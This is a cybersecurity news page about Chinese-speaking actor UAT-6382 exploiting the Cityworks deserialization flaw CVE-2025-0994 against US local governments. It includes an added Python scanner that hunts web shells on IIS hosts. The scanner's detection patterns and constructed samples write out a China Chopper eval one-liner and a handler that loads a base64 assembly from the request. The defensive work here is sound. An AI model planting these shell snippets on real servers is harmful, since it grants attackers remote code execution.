CyberSecurity news
Chinese-speaking hackers have exploited a zero-day vulnerability, CVE-2025-0994, in Trimble Cityworks software to breach multiple local governing bodies across the United States. The flaw is a deserialization of untrusted data in Cityworks that lets an authenticated user execute code on the Microsoft IIS web server hosting the application; it affects Cityworks versions before 15.8.9 and Cityworks with office companion versions before 23.10, and it has been actively exploited since January 2025 by a threat actor tracked as UAT-6382. The attackers targeted the enterprise networks of local governing bodies, conducted reconnaissance, and deployed web shells and custom malware to maintain long-term access, with a particular interest in systems related to utilities management.
UAT-6382 utilized a variety of tools and techniques in their attacks. They rapidly deployed web shells such as AntSword and chinatso/Chopper on the underlying IIS web servers. Additionally, they employed Rust-based loaders, known as TetraLoader, to deliver Cobalt Strike and VShell malware, ensuring persistent access to compromised systems. The TetraLoader was built using MaLoader, a malware building framework written in Simplified Chinese, further indicating the origin of the threat actor.
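The web shell stage described above is the part of this intrusion chain a defender can hunt for directly on the IIS host. The following is an added example, not code from Talos, Trimble or any of the articles cited here: a small Python scanner that walks a web root, flags server-side files matching textbook China Chopper / AntSword patterns, and lists recently modified .aspx/.ashx files for triage. The signatures, the sample file contents and the wwwroot/Cityworks paths are assumptions constructed for the demo; the page does not publish the actual files or paths recovered from the intrusions.

```python
"""Web shell hunt for an IIS web root, modelled on the UAT-6382 Cityworks tradecraft.

Added example, not code from Talos, Trimble or the cited articles. The signatures are
textbook China Chopper / AntSword ASPX patterns and the file paths are constructed;
neither is claimed to match the exact artifacts recovered from the intrusions.
"""
import os
import re
import sys
import time
from pathlib import Path

# Generic one-liner / loader patterns (assumed, textbook signatures, not Talos IOCs).
SHELL_PATTERNS = {
    # <%eval(Request.Item["pass"],"unsafe");%>  -- the classic Chopper ASPX one-liner
    "eval_of_request": re.compile(
        r"\beval\s*\(\s*Request\.(?:Item|Form|QueryString|Params)\s*\[", re.I),
    # JScript eval with the "unsafe" flag that lets the shell reach the full .NET API
    "jscript_unsafe_eval": re.compile(r'\beval\s*\([^;]*,\s*"unsafe"\s*\)', re.I),
    # C# handlers that load an attacker-supplied assembly straight from the request
    "assembly_from_b64": re.compile(
        r"Assembly\.Load\s*\(\s*Convert\.FromBase64String\s*\(", re.I),
    # Command execution fed directly by request parameters
    "process_start_from_request": re.compile(
        r"Process\.Start\s*\([^;]*Request\.", re.I | re.S),
}
WEB_CONTENT_EXTENSIONS = {".aspx", ".ashx", ".asmx", ".asp"}


def scan_content(content: str) -> list[str]:
    """Names of every signature that matches the text of one server-side file."""
    return [name for name, pattern in SHELL_PATTERNS.items() if pattern.search(content)]


def scan_entries(entries, newer_than_days=30, now=None):
    """entries: iterable of (path, content, mtime_epoch).

    Returns {path: {"signatures": [...], "recently_modified": bool}} for every
    server-side file that matches a signature or was modified inside the window.
    Recently modified files with no signature hit are still reported: a shell the
    patterns do not know is still a new .aspx that nobody deployed on purpose.
    """
    now = time.time() if now is None else now
    cutoff = now - newer_than_days * 86400
    findings = {}
    for path, content, mtime in entries:
        if Path(path).suffix.lower() not in WEB_CONTENT_EXTENSIONS:
            continue
        hits = scan_content(content)
        recent = mtime >= cutoff
        if hits or recent:
            findings[path] = {"signatures": hits, "recently_modified": recent}
    return findings


def iter_directory(root):
    """Yield (path, content, mtime) for every file under root, decoding leniently."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            try:
                with open(full, "r", encoding="utf-8", errors="ignore") as fh:
                    yield full, fh.read(), os.path.getmtime(full)
            except OSError:
                continue


def scan_directory(root, newer_than_days=30):
    """Scan a real web root on disk, e.g. the IIS site directory hosting Cityworks."""
    return scan_entries(iter_directory(root), newer_than_days)


# Constructed sample "files": paths under a hypothetical Cityworks web root.
SAMPLE_NOW = 1_748_000_000  # fixed reference time so results are reproducible
DAY = 86400
SAMPLE_ENTRIES = [
    # Chopper one-liner dropped next to the application, modified an hour ago
    ("wwwroot/Cityworks/help.aspx",
     '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
     SAMPLE_NOW - 3600),
    # Legitimate page untouched for a year: no signature, not recent, not reported
    ("wwwroot/Cityworks/Default.aspx",
     '<%@ Page Language="C#" %><html><body><% Response.Write(DateTime.Now); %></body></html>',
     SAMPLE_NOW - 365 * DAY),
    # Handler that loads a base64 assembly from the request body (AntSword-style loader)
    ("wwwroot/Cityworks/Temp/upload.ashx",
     '<%@ WebHandler Language="C#" Class="H" %>\n'
     'public class H : System.Web.IHttpHandler {\n'
     '  public void ProcessRequest(System.Web.HttpContext context) {\n'
     '    System.Reflection.Assembly.Load(Convert.FromBase64String(context.Request["d"]))\n'
     '      .CreateInstance("U").Equals(context); }\n'
     '  public bool IsReusable { get { return false; } } }',
     SAMPLE_NOW - 2 * DAY),
    # New page with no known signature: reported only as recently modified, for triage
    ("wwwroot/Cityworks/report.aspx",
     '<%@ Page Language="C#" %><% Response.Write("report"); %>',
     SAMPLE_NOW - 5 * DAY),
    # Static asset: outside the scanned extensions, ignored even though it is new
    ("wwwroot/Cityworks/logo.png", "\x89PNG", SAMPLE_NOW - 60),
]


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    results = scan_directory(target) if target else scan_entries(SAMPLE_ENTRIES, now=SAMPLE_NOW)
    for path, finding in results.items():
        print(f"{path}: signatures={finding['signatures']} recent={finding['recently_modified']}")
```

Run it with no arguments to see the constructed samples triaged, or pass the IIS site directory as the first argument to scan a real host. Signature hits are only one leg of the hunt: a clean scan does not rule out a shell written in a form these patterns do not know, which is why new server-side files inside the modification window are listed too, and any hit should be compared against the IOCs in the Talos write-up and Trimble's advisory before the host is declared clean.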
Cisco Talos researchers have assessed with high confidence that UAT-6382 is a Chinese-speaking threat actor, based on tooling, TTPs, hands-on-keyboard activity, and victimology. Indicators of compromise (IOCs) related to these intrusions overlap with those listed in Trimble's advisory. The Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-0994 to its Known Exploited Vulnerabilities (KEV) catalog in February 2025. Trimble's advisory also cautioned that the IIS identity running Cityworks should not hold local or domain-level administrative privileges, and that the attachment directory root should be limited to folders that hold only attachments; an application pool identity with excess rights turns a web shell on the server into a foothold with administrative reach. The exploitation of this flaw highlights the risk of nation-state actors targeting critical infrastructure software used by U.S. local governments and utilities.
References :
- Cisco Talos Blog: Talos has observed exploitation of CVE-2025-0994 in the wild by UAT-6382, a Chinese-speaking threat actor, who then deployed malware payloads via TetraLoader.
- securityonline.info: Critical 0-Day: Cityworks Flaw Actively Exploited by Chinese APT UAT-6382
- The Hacker News: Chinese Hackers Exploit Trimble Cityworks Flaw to Infiltrate U.S. Government Networks
- BleepingComputer: Chinese hackers breach US local governments using Cityworks zero-day
- bsky.app: Cisco Talos says a group tracked as UAT-6382 has used a recent Trimble Cityworks zero-day (CVE-2025-0994) to breach local governing bodies in the US
- malware.news: Trimble Cityworks zero-day attacks on US local governments detailed
- The DefendOps Diaries: Chinese Hackers Exploit Cityworks Zero-Day Vulnerability in US Local Governments
- www.scworld.com: Trimble Cityworks zero-day attacks on US local governments detailed
- The DefendOps Diaries: Exploitation of Ivanti EPMM Vulnerabilities by Chinese Hackers: A Detailed Analysis
- BleepingComputer: Ivanti EPMM flaw exploited by Chinese hackers to breach govt agencies
- securityaffairs.com: Chinese threat actors exploited Trimble Cityworks flaw to breach U.S. local government networks
- www.csoonline.com: A now-patched high-severity security flaw affecting Trimble Cityworks — a specialized software used by local governments in the US, utilities, and public agencies to manage their infrastructure and community services—was abused by Chinese hackers to compromise systems before a patch was available.
- blog.talosintelligence.com: UAT-6382 exploits Cityworks zero-day vulnerability to deliver malware
- www.techradar.com: The Chinese used the Cityworks bug to deploy Cobalt Strike beacons and backdoors.
- www.cybersecuritydive.com: Cisco Talos researchers attribute the exploitation of the CVE-2025-0994 in Trimble Cityworks to Chinese-speaking threat actor UAT-6382, based on tools and TTPs used in the intrusions.
- Blog: The Chinese-speaking cyber-espionage group identified as UAT-6382 has been observed exploiting a critical vulnerability in Trimble's Cityworks software to infiltrate U.S. government networks.
- StateScoop: Report: Chinese hackers used Cityworks vulnerability to deliver malware
- Cisco Talos Blog: Hazel observes that cybercriminals often fumble teamwork, with fragile alliances crumbling over missed messages. Plus, how UAT-6382 is exploiting Cityworks and what you can do to stay secure.
- hackread.com: Warnings on active exploitation of a zero-day vulnerability (CVE-2025-0994) in Cityworks.
Classification:
- HashTags: #Cityworks #ZeroDay #APT
- Company: Trimble
- Target: US Government
- Attacker: UAT-6382
- Product: Cityworks
- Feature: RCE
- Malware: Cobalt Strike
- Type: 0Day
- Severity: Major